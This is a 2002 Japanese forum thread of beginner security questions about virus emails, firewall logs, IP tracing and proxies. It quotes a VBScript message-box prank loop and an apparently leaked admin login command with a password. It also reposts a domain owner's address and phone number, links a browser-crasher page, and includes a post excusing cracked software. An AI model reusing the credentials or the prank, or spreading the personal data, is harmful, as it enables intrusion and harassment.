前者は必須
569助けてください:02/03/15 13:17
メールが一日に100通ほど来るウイルスに感染してしまいました。
今からウイルスバスターを入れたら直りますか?
くだらない質問ですいません。
>>569
ウイルスバスターが対応してるウイルスなら、直ると思います。
>>564 どっかでも聞いてなかったか?まあ、セキュリティと無関係じゃな
いので書いておくよ。
OEの「表示」→「レイアウト」→「プレビューウィンドウを表示する」
のチェックを外す
572まさ:02/03/15 14:58
見た瞬間に数百種類のウイルスに感染し、ブラクラで映像はグロという最強のURL知ってますか?
573名無しさん@お腹いっぱい。:02/03/15 15:27
今日の朝刊に日本語ウィルスの件載ってたけど、
ヤパーリ「うんこ」とは書いてなかった。
574564:02/03/15 16:52
ありがとう。
聞くの初めてです。
575名無しさん@お腹いっぱい。:02/03/15 16:56
ウザイやつのIP及び情報はここに。Part2
http://pc.2ch.net/test/read.cgi/sec/1010428470/ のスレ
壊れたのか?
>575
dat落ちしました。
今、IEで確認。
レス数985、最終書込が 02/03/15 15:51

そんな板orスレッドないです。
隊長! スレッド 1010428470.dat は、html化されるのを待っているようです。
しばらく待つしかない。
577教えてちゃん:02/03/15 18:20
今日ヘンなメールが来ました。これがウイルスかどうかわからないのです。
色々なウイルス情報見たんですけどわかりませんでした。

件名:do you enjoy 
添付ファイル interested.bat とParticiant Application.doc の二つ。
来たのは海外から。ヘッダにto:無し。
そして本文が何故かCan you and will you use a Japanese style toilet for 2 weeks? yes no
とトイレ関係で始まる(笑)
アンケート形式のナンバリングされた質問が7〜9まで。1から6は無し(笑)

これもやっぱりウイルスでしょうか?
>>576 板TOP3位にある状態でdat落ちは初めて見たyo! 題名なし1なしカ
キコできずだったんでどうしたのかと。
579 :02/03/15 21:33
>>577
ウイルスチェックはしたのか?
580cheshire-cat:02/03/16 00:52
なんだか今、リフレッシュタグ貼られたような感じで、リロード後に4回ほどまた初めから読み込みさせられるんだけど。

何なんだ?
581cheshire-cat:02/03/16 00:57
治った。漏れだけか、験が悪いな。
582おしえて:02/03/16 01:00
PCがウイルスに感染したかどうか簡単にわかる方法おしえて。
Tripwire
>>580-581
鯖監のページを取得してそのタブを閉じないでいると
そんな感じになるようです
585名無しさん@お腹いっぱい。:02/03/16 01:56
たった今プロバのメアドにウイルス届いたYO!
件名:資料
本文:なし
添付:patch.exe

送信元がODNだったけど見知らぬ人なので晒しちゃおうかな。(´¬`)
586名無しさん@お腹いっぱい。:02/03/16 02:05
当りの名前じゃなかったな。
残念。
>>582 アンチウイルスソフトで感染チェックする。
588名無しさん@お腹いっぱい。:02/03/16 02:56
>>585
オデンのどっかのサイトがはくられたみたいですね…
しかも、ネットショップ関係ダト思う。
そのサイトでしかさらしていないメアドから、ウイルスメールが毎日届くようになったもん。
大手じゃないけど、結構な数の出店があったと思うから、
そこの持ってるメアドはながれちゃったんだろうな、と推測。
こういう場合、そこに知らせてあげるべきだよね?
珈琲豆屋さんから、ウイルスメールが届くご時世かい…。
589名無しさん@お腹いっぱい。:02/03/16 08:07
あるディレクトリが丸見えのサイトがあります。
この中にcgiファイルがあるのですが、ダウンロードしてもhtml表示部しか見ることが出来ません。
このソースを見るにはどうしたらよいでしょうか?
>>590
気持ち悪いことやってないで、サイト管理人に聞け。
592 :02/03/16 17:19
>>590
祈りなさい。されば道は開かれよう。
ウイルスに犯されたようでHDDが初期化されてしまいました〜

それで万一の時のバックアップ用に外付けのHDDを買おうと考えているのですがSCSIとUSBのどちらがいいでしょうか?

USBの方が大容量でいい感じですが、ネット接続時に電源落とせたでしょうか?
>>591 >>592
早速のご回答有り難うございます。
サイト管理人に聞いた結果、無視でした。
祈ってみましたが、祈り方が悪いのか無理でした。

他に方法はありませんか?
>>594
あるよ。
596590=594:02/03/16 17:27
教えてください。
>>596
ちょっと待っとけ。
599590:02/03/16 17:35
祈りながら待ってます。
600名無しさん@お腹いっぱい。:02/03/16 17:45
†(-.-)
さぁ、祈りなさい
601590:02/03/16 19:04
祈り疲れました。
602名無しさん@お腹いっぱい。:02/03/16 21:36
://mbspro5.uic.to/user/mikkixi.html

↑このブラクラを踏んでしまったのですが、
http://school.2ch.net/test/read.cgi/campus/1016199981/このスレの
541、547、551、557の言っていることは本当なのでしょうか?
コワいです・・・。



>>602
IP厨のたわごとだから気にするな。
モグラの串焼きという5年くらい前に流行った手法。当時はISPのセキュリティが
甘かったからIPアドレス抜かれると電番まで抜かれた。今はそんなところは無い。
604602:02/03/16 23:23
>>603
レスありがとうございます。

なんか、個人情報が抜かれているのは確実だという
声が多いのですが・・・。
パスワード、メアド、名前などがばれてしまっているらしく、
「アドレス帳に登録されているメアドに悪戯メールが送られる
かもしれない」との声も・・・。
本当なのでしょうか?
>>601
くだらん。そんなことはない。
606605:02/03/16 23:26
>>604だった。
607 :02/03/16 23:45
>602
の踏んじゃった・・・
telnetいぱーい立ち上がったよー
それだけかと思ったら、接続しようとしたよー
608cheshire-cat:02/03/16 23:56
>>607
telnet.exe(でしたっけ?)削除していないの?
609便乗:02/03/17 00:02
>>608
telnet.exeの削除方法を教えてください。
ファイルを探してデリートでOKでしょうか?
telnetサービスは無効にしてあります。

OS:Windows XP Pro
>>608
最近はハイパーターミナル
ふつーレジストリのtelnet,rlogin,tn3270は削除
611不正登録?:02/03/17 01:38
実家の大阪にXPとウィルスバスター2002を
買って送ってやったのですが、どうやら自分がインストールする前に
「友達に貸してしまった」らしいのです。その友達は
「誰でも何度でも使える」と豪語したそうですが、あとで
自分がインストールするときに不正コピーになると思い、
すぐに返してもらえといってあります。
ここで皆さんの意見を聞きたいのです。やはりすぐに返してもらうべき
なのか、それとも、じつは不具合なく使いまわせる
ということがあるのか。私自身、パソコン初心者なので
はっきりした意見がいえないのです。よろしくお願いします。
612名無しさん@お腹いっぱい。:02/03/17 01:43
>>611
がんばってね
ネタがちょっと…
613 :02/03/17 01:57
degawa.cgi
614 :02/03/17 02:57
>>611
その貸してやったヤシはただの厨房なのか、それとも少なくとも
アングラ系サイトを巡回できるレベルなのかどっちだ?
後者ならクラックの方法ぐらい知っていると思うので安心せい。
クラックして何度でも使いまわせる様にした糞Pはシリアル難波も
別なので問題ない。性器の物はちゃんと登録できるはず。
厨房なら直ぐ返してもらえ。

質問です。信じて貰えないかもしれませんが
以前2ちゃんねるの書き込みから私のプロバイダのメールアドレスが
割れたことがあるんです。
ちょっと調子に乗った書き込みしてたらあかの他人から
「君、こんな事2ちゃんに書いちゃダメだよ〜?」っとやんわり
お叱りのメールが届きまして。
それ以来怖くなってネット上で調子こかないようにしてるのですがw
「○○スレッドの××番目の書き込みは君でしょ〜?」
と相手には分かっていたので、2ちゃんの書き込みからメルアドが割れた
のは間違いないと思います。(もちろん2ちゃんにメルアドは載せてないです
2ちゃんねるはIPを保存してない事で有名ですが
こんな事って可能なのでしょうか?
重ね重ね信じて貰えないかもしれませんが、マジっす。
616615:02/03/17 03:03
ちなみにその時はIPが割れるようなトラップに
ひっかかったワケでもないっす。
>>615
そのお叱りのメール、晒しageキボーンヌ
ってネタはやめれっつーの。
618615:02/03/17 03:13
少し前の話で、そのメールが届いた後
怖くなってHDを消したのでメールは残っていません。
「どうして分かったのか?」と言う旨の返信をしたのですが
返事は来ませんでした。
ちなみに届いたメールの件名は
「八苦八区ハックしちゃいました♪」って言う感じの
ちょっとふざけた感じっぽかったですw
どーいう追跡の仕方をしたらバレるんでしょうかね???
>>615
あかの他人のフリをした同級生だったり、同僚だったり、家族だったり、FW管理者だったり…
620615:02/03/17 03:51
>>619
確かにその可能性は捨てきれないですね。
心当たりはないのですが、怖いのでそう思う事にしますw

続けて質問で申し訳ないのですが2ちゃんねるが
「書き込み元は絶対にバレない。なぜならIPを保存してないからだ!」
って言うのはどういう仕組みなのでしょうか?
書き込み内容は反映されているので微小なりとも「アクセスログ」的な
モノが残っている(残ってしまう)のが普通ではないのかなー?
と思ってしまうのですが。

ちなみに自分はウイルススキャンソフトやPFWを入れるだけ程度の知識しか
なく、セキュやハックに関してはかなり素人です。
専門用語満載でも構いませんのでどなたかご説明していただければ
ありがたく思います。
621 :02/03/17 05:02
>>615
会社からの書き込みだったらネット管理者説が濃厚。
普通は通信記録をチェックしてるでしょ。
いたずらよりも寧ろ注意喚起。

あと、
アクセスログの保存はするかしないか管理者次第だと思うんだけど。
ひろゆきはチェックはしてないし保存はしてないみたいなこと言ってたような…
素人なんでよくわかんないけど「リアルタイムで」2ちゃんのサバからIP抜いてさらにそのIPを管理してるところをハクる。
こんなことでもしないと2ちゃんから個人情報抜くのは無理だと思うんだけど。
622621:02/03/17 05:04
↑自分で言うのもなんだが「だけど星人」みたいになっちまった(w
623名無しさん@お腹いっぱい。:02/03/17 09:00
>>615
素人なんで良くわからないけど、
2chの書き込みから追跡されたんじゃなくて、
もともとPCごとハクられてたと考える方が簡単じゃないの?
624名無しさん@お腹いっぱい。:02/03/17 09:29
そういやネット始めたばっかりの頃(4年前ぐらい)、
確かICQだったと思うけど、
初対面のアメリカ人の少年とチャットしてて、
「あなたは黒人?白人?」って聞こうとして、
途中までタイプして、
やっぱりその質問はやめておこうと思って、
BackSpaceで消したんだけど、
消し終わろうとした瞬間に、
「僕は白人だよ」って言われてびっくりした。
送信せずに消したし、
送信されてない証拠にチャット画面にも出てなくて。
気持ち悪くなってすぐチャットやめたんだけど、
これって画面覗かれてたのかな?
625名無しさん@お腹いっぱい。:02/03/17 11:33
Norton Personal Firewall なんですけど
変なとこアクセス変更したのか
こんなのログが残るのですが・・・どこを修正すればよいのやら
とんと??です
ちなみに1分に3回ほどログが残ります
日付: 2002/03/17 時刻: 11:26:16
規則「SSDP Service on Windows Millennium」が fmv-biblo-i1,1900 をブロックしました。詳細:
インバウンド UDP パケット
ローカルアドレス、 サービスは fmv-biblo-i1,1900
リモートアドレス、 サービスは fmv-biblo-i1,1028
プロセス名は C:\WINDOWS\SYSTEM\SSDPSRV.EXE

ご教授くださいませ
626 :02/03/17 13:51
>>624
それICQじゃないと思われ
628名無しさん@お腹いっぱい。:02/03/17 18:09
>>626
逝ってきました、怖いこと書いてあり速攻インストールしたけど
変わりなしです
で、最近マイクロソフトでアップデートしたときMSメッセンジャー入れてたんで
削除したらなんとなく治まったみたいな。。。関係ないかぁハァ〜
629 :02/03/17 18:37
2chIDをIPに変換できるやつ
あれ何処行ったの?
630すまん!!!:02/03/17 20:09
むかつく奴のIPを手に入れました。
どうすれば奴を絞めることができますか?
>631
そういう質問は初級ネットでやってくれ。
>>631
相手がIP再取得してたら全然違う他人に迷惑をかけることになるが。
634名無しさん@お腹いっぱい。:02/03/17 22:32
>>2-3に書いてある物のほかに、
何か「これぞっ!」というようなログ解析ツールはありますか?
635615:02/03/17 22:39
ちょっと昼間は用事があったのでレス書けませんでした、スマセン。
>>621
書き込みは自宅のPC・契約プロバイダからの接続で行っていました。
>>623
当時他の板、他のHPでも煽り・暴言・暴露話を書いていたのですが(w
お叱りを受けた対象の書き込みをするまで注意を促すメール等は
来た事が有りませんでしたので、もともとハクされていた可能性は
少ないかな?と思っています。
>>621さんが言われたように
「2ちゃんのサバからIP抜いてさらにそのIPを管理してるところをハクる。」
が行われたのかな〜?
でもそれって物凄い手間とスキルが必要ですよねぇ。うーん。

マルチになってしまいますが、初級ネット板でも聞いて見ます。
皆さん、ありがとうございました。
636名無しさん@お腹いっぱい。:02/03/17 23:38
マカフィーのスレってどこいっちゃった?
>>636
スレ立ちませんでした。
よって、終了。
638636:02/03/17 23:45
>637
やっぱりそうですか・・・
ソルトレイクシティで行われたオリンピックで
スピードスケートでラッキーで優勝したオーストラリアの選手の名前はなんだったでしょうか?
1位でゴールしたにもかかわらず、失格になった韓国の選手の名前はなんだったでしょうか?
640_:02/03/18 00:42
>>624
昔のICQのchat機能って一文字ずつ表示されたね。
641名無しさん@お腹いっぱい。:02/03/18 06:53
 
642名無しさん@お腹いっぱい。:02/03/18 13:51
パソコン起動時にAVGが自動で起動しないように設定するにはどうするんですか?
643名無しさん@お腹いっぱい。:02/03/18 14:29
タイトルが「次回飲み会の地図」、本文が「次回飲み会の地図を
送付しマース。」で、jpg画像付きのウイルスってあります?
ちなみに画像はチンコでした。
644ウイルス?:02/03/18 18:51
送信者 cytex (←知らない人)
タイトル A special nice game
本文 This is a nice game
   This game is my first work.
   You're the first player.
   I expect you would like it.
添付ファイル picacu.exe(85.3KB)
このpicacu.exeは実行しても大丈夫ですか?
645オール反珍:02/03/18 18:54
拡張子を変えて
・・ソースにならないか・・・・・
>>644
ピカチューEXEかい(w
まあ、9割方ウイルスだろうな
思いっきり怪しいだろう。
実行して良いかなんて、そんなこと人に聞いてる時点でナンセンスだと思うよ。
648644:02/03/18 19:51
その後
とりあえず添付ファイルを適当なフォルダに保存してみた。
そしたらその直後DOS画面になってAVGが警告を出した。
「Klez.E」というウイルスみたい。AVGが発病を止めてくれた。
レジストリ等を念のためチェックし無事を確認。
このウイルスって6日になるとファイルを0に置き換えちゃうのね。
結果 大丈夫じゃなかった(自己解決)
初心板で、ぞぬが発生しているのに
http://cheese.2ch.net/test/read.cgi/qa/1016355638/
http://cheese.2ch.net/test/read.cgi/qa/1016346854/784-

漏れの ぞぬアラームは検知してくれません
どうしてでしょうか?

気付いたら、漏れのPCがぞぬだらけになってしまいました
お前ら、何とかして下さい

電波キタ ─wwヘ√レvv〜(゚∀゚)─wwヘ√レvv〜─ !!!
651名無しさん@お腹いっぱい。:02/03/18 21:05
>>649
大変だな、あんた
652厨房女:02/03/18 21:12
すみません。ここで聞いてもよいかわかりませんが質問です。

下のような書き込みを見たのですが、これを実行すると
どうなるのでしょうか?

>まず、適当なテキストファイルを作れ。メモ帳で十分だ。
 で、以下の文字をコピペしろ。
 Dim i
 For i=1 to 65535
 MsgBox "(^∀^)シネヨ!"
 Next
 これでオッケーだ。次に文書を 〜.vbs と命名して保存する。
 最後に保存した文書をダブルクリックしてみろ。
653cheshire-cat:02/03/18 21:30
>>652
変なメッセージボックスが表示されるだけ。
やめとけ。
654 :02/03/18 21:31
>>652
やってみりゃわかる
つーかfor文見てみろよ プログラムのプの字もしらんのか?(プ
ネタでしょ
656新生ぞぬアーマー:02/03/18 21:34
>>651
そうなんですよ、お前ら、助けて下さい
もう脳まで・・・

ぞぬアーマー軍団に参加するぞぬ
657名無しさん@お腹いっぱい。:02/03/18 21:52
>>656
脳までぞぬぞぬかー
658名無しさん@お腹いっぱい。:02/03/18 23:05
こいつ、コーゲキしてくるんだ。
だれか、助けて。

203.181.96.161
gsr-ote2.kddnet.ad.jp

203.181.96.82
tr-ote3.kddnet.ad.jp

210.120.192.1
ysng12bb1-ge3-0.tr.bora.net

210.120.248.131
ysnbbb71-ge4-0-0.rt.bora.net
659cheshire-cat:02/03/18 23:14
>>658
それぞれのIPアドレスが近いんだけど。
Port80叩かれているのか?
660七誌見習い:02/03/18 23:23
一度読んだら消えるメールが書けるツールを探してます。
昔はよく見かけたんですが最近ぜんぜんみかけなくなっちゃって・・・
なにかヒントをいただけたらと思います。
よろしくおねがいしますm(__)m
661cheshire-cat:02/03/18 23:25
>>660
手紙大作戦。
662七誌見習い:02/03/18 23:32
>>661
くだらない質問にレスありがとうございます。

携帯電話に送れるとかってありますか??
そっちも是非お願いしますm(__)m
663名無しさん@お腹いっぱい。:02/03/18 23:33
ハッカーの皆さん。ハッキングの方法の乗っているサイトをおしえてちょ。
マカフィースレ立てていいですか?
665cheshire-cat:02/03/18 23:39
>>662
>携帯電話に送れるとかってありますか
携帯で受信するメールに送信できる、の意味?
666 ◆oXbs48Fk :02/03/18 23:42
一定時間毎に「モコ」って音が鳴るウィルスありますか?
最近なりはじめたんですけど・・・
幻聴じゃないよ(w
668名無しさん@お腹いっぱい。:02/03/19 00:06
携帯電話にエロスパムすると言う事は、未成年者の利用もあることから考えれば
犯罪と考えられます?

DOCOMOなので、ソースが無いんですけど、
メールの内容から、kanjiru.netっつうのがあって

index.htmlがないから、チャット、入り放題(笑
逝っても、つまらんけど…CGIはそのまま落とせるし、セキュリティー甘い

で、こいつは

Kojiro Sato
Minaminaka
Yokohama-shi, Kanagawa 231-0006
JP

Domain Name: KANJIRU.NET

Administrative Contact:
Kojiro Sato [email protected]
Kojiro Sato
Minaminaka
Yokohama-shi, Kanagawa 231-0006
JP
Phone- 045-651-6860

らしいよ、登録した奴だけどね…

で、IPサーチで、更に見てみると
株式会社ラット (RAT Co.,Ltd.)
NETPLATZ [210.172.232.0 <-> 210.172.232.127] 210.172.232.0/25
三菱電機情報ネットワーク株式会社 (MITSUBISHI ELECTRIC INFORMATION NETWORK CORPORATION)
SUBA-052-232 [サブアロケーション] 210.172.232.0
だってさ…三菱???

>>668
意味わからずに検索するなよ。
>>669
ネタなのかな?
って感じがするんだけど、

実際逝ってきた…
イロイロ楽しい感じ
671ちょいと質問:02/03/19 00:46
市販されてるセキュリティソフトで
圧縮されたトロイを発見できるものが
あれば教えていただきたいんですが・・・
>>670
携帯のメアド収集サイトとみた
http://kanjiru.net/cgi/nuki.txt
674名無しさん@お腹いっぱい。:02/03/19 12:44
すいません、ここで聞いて良いか判りませんが…。
IE6とXPの環境です。
ネットサーフィン中、とりあえずリンクをクリックしてサイト移動しようとすると、何故か特定のサイトへ強制的にリンクします。
(特に、とあるカジノサイト)
具体例を挙げると、YAHOOからXと言うサイトを検索し、飛ぼうとするとXではなくカジノ系サイトへ飛んでしまいます。
エロサイト大好きなのでヤバイ所にも行ったと思います。
何かPCに寄生してるのかな?と思いウイルスバスターかけても何の反応もありません。
ディスクトップや他の場所に見慣れないアイコンがあると言った事もないです。
一体なんなんでしょう??
675643:02/03/19 13:11
誰もわからないですか・・・。
こんなウイルス聞いたこともないので、とりあえず送り主のプロバイダーに
連絡はしたんだけど・・・。
676名無しさん@お腹いっぱい。:02/03/19 13:28
フォルダにパスかけれるフリーのソフトないですか?
>>676
マルチ(複数)投稿は御法度ですよ
http://pc.2ch.net/test/read.cgi/software/1002290976/940

今回だけは教えますから以後、気をつけて下さい

Password Folder
http://www03.u-page.so-net.ne.jp/wa2/ikaia/
メールでユーザー登録するとフリーらしいです
678名無しさん@お腹いっぱい。:02/03/19 20:43
netstat -aで、
Local AddressもForeign Address自分のところでLISTENINGって言うのは
こいつは、何を企んでいやがりますか?
>678
もっとちゃんとした日本語書いてくれ。
で、開いてるポートは何?
>>679
TCPって書いてあるところ全部・・・・例えば1025とか5000とか。
TCPって接続先がない状態だと、自分のところの0.0.0.0を表示すものなんですか?
 
682名無しさん@お腹いっぱい。:02/03/21 03:06
ttp://www.zdnet.co.jp/news/0203/20/ccdlegal.html

いまこのサイトに行ったら右上に

今日のニュース
2002年3月21日 connect 'ssh -l broom.zdnet.co.jp:20023' wait 'login:' sendln 'zdadmin' wait 'Password:' sendln 'zdadm!n' sendln 'zdupdate news/past/past.txt' sendln 'logout' end

って出たんですが、これってなんでしょう?
683名無しさん@お腹いっぱい。:02/03/21 13:19
>>682
あーっ 書いちゃった。 自首すると罪が軽減されるよ。
684名無しさん@お腹いっぱい。:02/03/21 13:37
別板行ってると
リモートホストがやたらとアクセスしようとするんですけど。
685名無しさん@お腹いっぱい。:02/03/21 13:54
インターネットにjoeアカおくな!! >zdnet
686名無しさん@お腹いっぱい。:02/03/21 15:40
私のパソコンなんですが、ドライブでダブルクリックするとバックアップがでてくるんです。
ファイルとかは正常にうごくんですが・・・
ウイルスにやられたのでしょうか?
あと、それよりだいぶ前からモニターの上がゆがんでるんです。
波を打ってるような感じです。これってウイルスなんでしょうか?
687 :02/03/21 16:20
>686
>私のパソコンなんですが、ドライブでダブルクリックするとバックアップが
>でてくるんです。
もぅ全く意味不明だ!
何のOSで?漠然とバックアップ?ってなに?

>波を打ってるような感じです。これってウイルスなんでしょうか?
違います。ピンがはずれかけか、ほこり溜まってんじゃない。
掃除してみれば直るよきっと
688686:02/03/21 16:38
ありがとうございますOSはWINDOWS98です。
バックアップは、マイクロソフトバックアップがたちあがります。
マイコンピュータのドライブをダブルクリックするとたちあがってきます。
また、スキャンディスク、デフラグをすると、CDROMなのでできませんと表示されます。
689阿斗:02/03/21 17:00
>>686
なにやらかしてそうなったのかわからんがとりあえず上書きインストール
した方が良いのでは。
690 :02/03/21 17:11
ケーブルでグローバルIPもらえる事になったのですが、トロイとか色々
何をどう気をつければいいのでしょうか?
やはりルーター等を入れなければいけないのでしょうか?
NETは最初がケーブルなので、セキュリティに関してもルーター等に関しても知識が無いので・・・
691 :02/03/21 17:26
普通に使うんならファイアウオールソフトを入れるだけ
でいいと思う。
692 :02/03/21 17:27
>>690
セキュリティ関連のソフトを入れれば?
693名無しさん@お腹いっぱい。:02/03/21 17:40
テスト
694686:02/03/21 17:50
ありがとうございます。
アイコンの変更をしようとすると、hddにアプリケーションとしてマイクロソフトバックアップ
がでてくるようになってしまってるのです。
上書きインストール以外でなにか直す方法ありませんか?
セキュリティ診断するページで自分のWindows情報を見たら
RemoteAddressというのだけ表示されてしまいました。
これってなんなんでしょう?
そして見えなくさせるにはどうすればいいんでしょうか?
696 :02/03/21 18:43
>>695
とりあえず検索しろや。
>>695
マルチやめなさい。
 
ping -tもDos攻撃の一種ですか?
700名無しさん@お腹いっぱい。:02/03/22 12:52
すごい初心者なんですが、よろしいでしょうか?

知人や、知人の知人のメールアドレスから、
「Happy Lady Day」とか、似たような件名のメールがくるんです。
html文書と、拡張子がexeやbatのファイルがついています。
そのhtml文書はまた別の知人のwebページの一部だったりもします。

そして私からも、知人に同じようなメールを送信しているらしいのです。
PCの動作も重くなり、困っています。

これってウイルスですよね?
検索しても出てきません、、、
良かったら対策を教えてください!
ガイシュツだったらすみません。
701名無しさん@お腹いっぱい。:02/03/22 13:35
>>700 W32.Klez.E@mmに感染している。アンチウィルスソフトを買う。
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
に対策あり。
702名無しさん@お腹いっぱい。:02/03/22 13:43
すみません、デスクトップ右下に変な広告がでるのですが
これはどうすれば出ないようにできるのでしょうか?
703名無しさん@お腹いっぱい。:02/03/22 14:02
この板の人っていつもすごい数の攻撃を受けてるみたいだけど、
それってパソコンに詳しくなると活動範囲が広がるから
目をつけられやすくなって攻撃されてるんですか?
それともボクら初心者は攻撃されていること自体に気づいてなくて
実はこの板の人以上に攻撃を受けているだけですか?
>>703 後者。そう、気付いてないだけです。ただダイヤルアップだと頻繁にIP
変わるし、接続時間が短いので標的にはされにくいけどね。
705 :02/03/22 14:06
>>702
終了させれば?

>>703
レス=攻撃とでも思っているの?
いくら初心者でも自分の環境ぐらい書けるでしょ?
あいまいな質問にはあいまいな回答しか返ってこないよ
706名無しさん@お腹いっぱい。:02/03/22 14:12
小規模なオフィスにおいて、ルーターでパケットフィルタリングした上で、別途にファイヤーウォールを導入する意味ってあるんですか?
707703:02/03/22 14:23
>>704
ありがとうございます。

>>705
すいません。レス=攻撃というのがよく分かりませんが、一般論が聞きたかったんです。
708名無しさん@お腹いっぱい。:02/03/22 14:25
>>701
わざわざありがとうございます!
今からさっそく対処法の通りにしてみます。
709名無しさん@お腹いっぱい。:02/03/22 14:39
インターネットの料金が分かる場所って何処ですか?
携帯の通信料みるところみたいなOCNでISDNです
>>709 板違い。ここはセキュリティ板。
>>705
> レス=攻撃とでも思っているの?

そうじゃなくて(w、実際のハッキング攻撃のことを言ってるんじゃないの?
712名無しさん@お腹いっぱい。:02/03/22 15:18
取ってもスマソ>710
713名無しさん@お腹いっぱい。:02/03/22 15:25
>>703
この板に書き込まれる件数と日本全国でネットに繋げられる人の数を考えれば
少ないだろ?

攻撃=ポートスキャンじゃないのは解るよな
実際にバックドアから侵入されたとか置きみやげ置かれたとかそんなに出てないだろ

#別の攻撃なのか?
#ウイルスも攻撃で良いのか?
714春なんだから質問スレはage進行で:02/03/22 16:39
>>713
ホワイトハウスの件は攻撃とは言わないのか。そうか。
>>715
言わないよん
>>716
一つ賢くなったサソクソ。でも、まだその線引きがよく分からん。
出来れば一つご鞭撻願いたいが、どうか?
 
激しく既出だとは思うのですが見つけられないので。User Agent他のHTTP Requestをそぎ落としたいのですがどうすればよいでしょう?
あとproxyについても教えていただければ幸いです。
720 :02/03/23 01:54
>>719
UserAgentを変えたいのならタブブラウザでも使えば?
Proxyについて何を知りたいの?
721名無しさん@お腹いっぱい。:02/03/23 01:55
>719
http://www8.big.or.jp/~000/CyberSyndrome/ ←ここ行って見るべし
>>720,>>721さん
ありがとうございます。当方、主にIEエンジンのタブブラウザを使っております。結局MSIEで出てしまいます。
一応プロシキも二段ほど通しているのですがRequestはもろにでていたようなので…
とりあえずリンクで勉強してきます。とりあえずありがとうございました。
723 :02/03/23 02:21
>>722
タブブラウザを使っているだけで設定を全く変えてない
ってことはないよな?
>>723
どこの設定のことでしょう?プロキシは変更(といいますか内部プロシキ使っているのでIE依存で変更)していますが?
User-Agentはどうすれば?レジストリは書き直されるし…
725 :02/03/23 04:29
>>723
変更したいのはUser-Agentだろ? プロキシは関係なし
Use-Agentを変えられないタブブラウザ使ってるんじゃないの?
727名無しさん@お腹いっぱい。:02/03/23 12:22
Temporary Internet Files\ContentIE5フォルダの中にある
数字アルファベット計8文字のファイルを
ウィルスの疑いがあるとアンチドートが警告しました。

しかしTemporary Internet Filesフォルダを開けて
全てのファイルを表示にしてもIE5以下のフォルダは見つかりませんでした。
フォルダ内のファイルを全て削除してもIE5以下のフォルダは
存在しています。どこを探せばいいでしょうか。

ちなみにNAVとVBオンラインスキャンではウィルスは発見されませんでした。
728名無しさん@お腹いっぱい。:02/03/23 14:32
既出かとおもうのですが質問させてください。
KLEZ.Eウィルスに感染したPCから削除できないファイルがあります。
ウィンドウズ使用中のシステムファイルということなので
MS−DOSよりDELコマンドで削除しようとしましたが消せませんでした。
原因は何でしょう?
対処法がありましたらお教えくださいm(__)m
729名無しさん@お腹いっぱい。:02/03/23 14:50
質問ですが・・ADSLでルーターを使用しているんですけど・・・
この間までポート21番と80番が開いていたままネットにつないで
いたんですが・・・(今は全部ステルスですが)ノートンのFWと組み
合わせていたんですけど(FWだけだとポートは全てステルスです)
これってグローバルIPはポートが開いているけど、プライベートIPの
ポートはステルスだってことでいいんですか?
>>725
たぶんそうだと思います。(表の)設定には見当たりません。変更できるツールにはどのようなものがありますか?検索だとヒット数が多すぎて(もしくは該当無し)絞り込めません。教えていただければ幸いです。
Windows NT 5.1です。
731ore:02/03/23 16:29
IPアドレスのフィルターの範囲指定の仕方教えて下さい

具体的に 218.14.*.* から 218.62.*.*
までしたい。
732名無しさん@お腹いっぱい。:02/03/23 17:48

マカフィーはダメ スレのpart3が見つからないけど
誰か知りませんか?

無い?
>>731
218.14.0.0-218.62.255.255
734何でCE機で見れないんですか?:02/03/23 19:10
735ore:02/03/23 19:24
IPフィルタでかくんですよね!!
そういう書き方できないです
マスがあって 1あどれすつ書くのが限界
736cheshire-cat:02/03/23 19:42
>>728
駆除ツール使えば、とか言ってみる。

>>729
過去・現在の状況が混じっていて、文意が読み取れないんだが。
NAT変換してると、ダイレクトにこちら側の個々のプライベートIPアドレスに(基本的には)接続できないので、さほど問題無いような気が。
もちろんルーターの内側がグローバルIPアドレスだったら、やばいけど(企業やお役所ではあるんだよね、そゆの)。

でもやっぱり、ルーターのフィルタリングすればいいのに、と言ってみる。
737cheshire-cat:02/03/23 19:46
>>735
範囲指定とかサブネットマスクで指定できないのか?
VBS_TIMOFONICA
みたいな 携帯を壊す ウイルスって他にあるんですか?
502の機種をとめる(金縛り?)みたいなのもありましたが。
今現実的に簡単に携帯をおかしくする方法おしえてください。
水に浸ける
>>738
氏ねい。
741730:02/03/24 00:09
失礼しました。幾つか検索回ってきましたが要求を満たしたものが見つけられたと思います。ありがとうございました。
IPフィルタリングでポートを全部閉じてネットをやるには
53と80だけ開けばよいのですか?
いえ、ネットをするには全部開けなければなりません







25と110も開けて下さい
744 :02/03/24 00:55
 
745 :02/03/24 01:13
こんばんわ、質問させて頂きます。
ハッカー(或いはクラッカー)は個人のパソコンにハッキングする事ができるのでしょうか?
自分で調べたところサーバーにしかハッキングできないと思うのですが・・・
どうなんでしょうか?
厨な質問ですみません。どなたかご教授お願いします。
富士通のFC3521RA1ていうADSLモデムに、
昨日までログインできていたのに突然ログイン出来なくなりました・・
1月にパスワード変更して以来、何もパス関連は触ってないです・・・
どうにかログインできる方法ないですか?
>745
出来ます。踏み台とかに使われたりします。
大抵、サーバに侵入しようとする奴は、個人のパソコンを踏み台にしますので。

>746
http://pc.2ch.net/test/read.cgi/sec/1016892103/のスレを削除依頼してこい
あと、セキュリティ関係なの?
748745:02/03/24 01:44
>>746
なるほど踏み台ですか、ありがとうございます。
外部からパスワード変更されたのかな? と思って一応セキュリティに。
削除依頼だしてきますm(__)m
750名無しさん@お腹いっぱい。:02/03/24 01:47
>>746
 ブロードバンドルーターのおすすめを教えて 2http://pc.2ch.net/test/read.cgi/hard/1012450559/-100
751 :02/03/24 04:29
yahooチャットで親友だと思っていた人にIP抜かれました(涙
その人のIP抜き返したいのですが、どうすればよいのでしょうか?
ノートン インターネットセキュリティーでもわかるでしょうか?
        
752 :02/03/24 07:33































>>742 あとはIISを動かせば完璧です
>>751
マルチだから裏切られるんだよ。なんだよ「抜き返したい」って。w
歳いくつだよ?
たった今、2chへIE6でカキコしていたら、知らないサイトが勝手に
立ち上がりました。これって、ハッキングされてる?厨な質問で申し訳
ありませんが、ご教示ください。

↓これがそのサイト
ttp://205.134.182.163/1/cbr.htm


757755:02/03/24 15:56
↑怖くて開けない。何?
>>757
ぶらくらちぇっかあ
759755:02/03/24 16:59
>>758
ちぇっかでした。いや、そうじゃなくて。ブラクラでないのは承知してますよ。
現実に立ち上がっていたんですから。なぜ、逝ったこともないサイトが勝手に
開かれるのかご教示願いたいのです。
>>759 どの板で書き込んでたら飛ばされたのか書かないと検証できない。
その後もその板に書き込んだら再現されるのか?
